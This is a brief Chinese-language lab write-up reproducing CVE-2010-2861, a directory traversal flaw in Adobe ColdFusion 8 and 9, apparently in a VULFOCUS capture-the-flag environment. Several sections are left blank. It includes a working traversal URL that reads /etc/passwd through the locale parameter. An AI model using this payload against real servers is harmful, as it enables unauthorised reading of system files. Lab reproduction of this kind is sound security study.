1.1漏洞描述
|------|---------------|
| 漏洞编号 | CVE-2010-2861 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 | |
描述: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
1.2漏洞等级
高危
1.3影响版本
Adobe ColdFusion 8、9版本
1.4漏洞复现
1.4.1.基础环境
访问`http://your-ip:8500/CFIDE/administrator/enter.cfm\`,可以看到初始化页面,输入密码\`admin\`,开始初始化整个环境。
1.4.2.前提
-
网站后台地址:
-
后台管理账密:
-
后台登录地址
1.5深度利用
1.5.1漏洞点
访问
http://192.168.1.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
用burp截取,删除其中的cookie信息后,即可读取文件`/etc/passwd`:
删掉后
查找falg
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
- 升级
- 打补丁
- 上设备